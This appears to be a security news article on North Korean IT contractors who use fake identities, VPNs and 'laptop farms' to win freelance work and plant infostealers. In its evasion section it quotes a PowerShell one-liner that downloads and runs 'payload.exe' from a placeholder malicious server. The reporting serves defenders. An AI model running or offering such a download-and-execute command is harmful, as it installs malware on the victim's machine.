Since at least 2018, a covert network of thousands of North Korean IT contractors has infiltrated global technology and infrastructure firms by masquerading as legitimate freelancers.
These operatives, operating under fabricated identities with AI-generated headshots, routinely use VPN services and “laptop farms” to disguise their geographic origins and circumvent platform verification checks.
Posing as developers, architects, and designers, they secure contracts on major freelancer platforms and enterprise portals, quietly funneling stolen credentials and sensitive data back to their handlers.
Initially identified through anomalies in VPN exit nodes and account creation patterns, the scheme gained momentum in mid-2024 when infostealer logs began revealing connections from DPRK-owned VPN clients such as NetKey.
The malware deployed on compromised workstations exfiltrates session tokens, API keys, and SSH configurations, enabling persistent access to corporate networks without raising immediate suspicion.
Kela Cyber analysts noted that many of these infostealer infections leveraged common development tools—Python, Node.js, and JetBrains IDEs—alongside bespoke loaders disguised as benign executables like Call.exe and Time.exe (Thousands-of-North-Korean-IT-Workers-Using-VPNs-and-Laptop-Farms-to-Bypass-Origin-Verification.pdf).
By blending into legitimate workflows, these operators not only evade detection but also expand the potential impact of their espionage activities.
In 2025 alone, compromised accounts surfaced on collaboration platforms such as Slack and GitLab, allowing attackers to deploy patches laced with backdoors.
.webp "Thousands of North Korean IT Workers Using VPNs and 'Laptop Farms' to Bypass Origin Verification 3")
The financial sector experienced surges in fraudulent wire transfers, while critical infrastructure projects saw unauthorized design modifications slip through code reviews—threats that underline the severity of this state-backed campaign.
Detection Evasion Tactics
A cornerstone of this operation is the use of geographically dispersed “laptop farms”—collections of remotely controlled machines that rotate through IP addresses to emulate authentic user behavior.
Upon infecting a workstation, the infostealer executes a PowerShell loader with commands resembling legitimate maintenance scripts, for example:-
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://malicious.server/payload.exe','payload.exe'); Start-Process '.payload.exe'"This technique not only fetches the infostealer payload under the guise of routine updates but also leverages IP rotation to thwart origin-based security checks.
In tandem, operators automate identity management via browser sandboxing tools like IxBrowser, assigning unique credentials and multi-factor tokens for each persona.
These layered tactics ensure that anomalous traffic blends seamlessly with genuine developer activity, complicating forensic analysis and prolonging dwell time.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
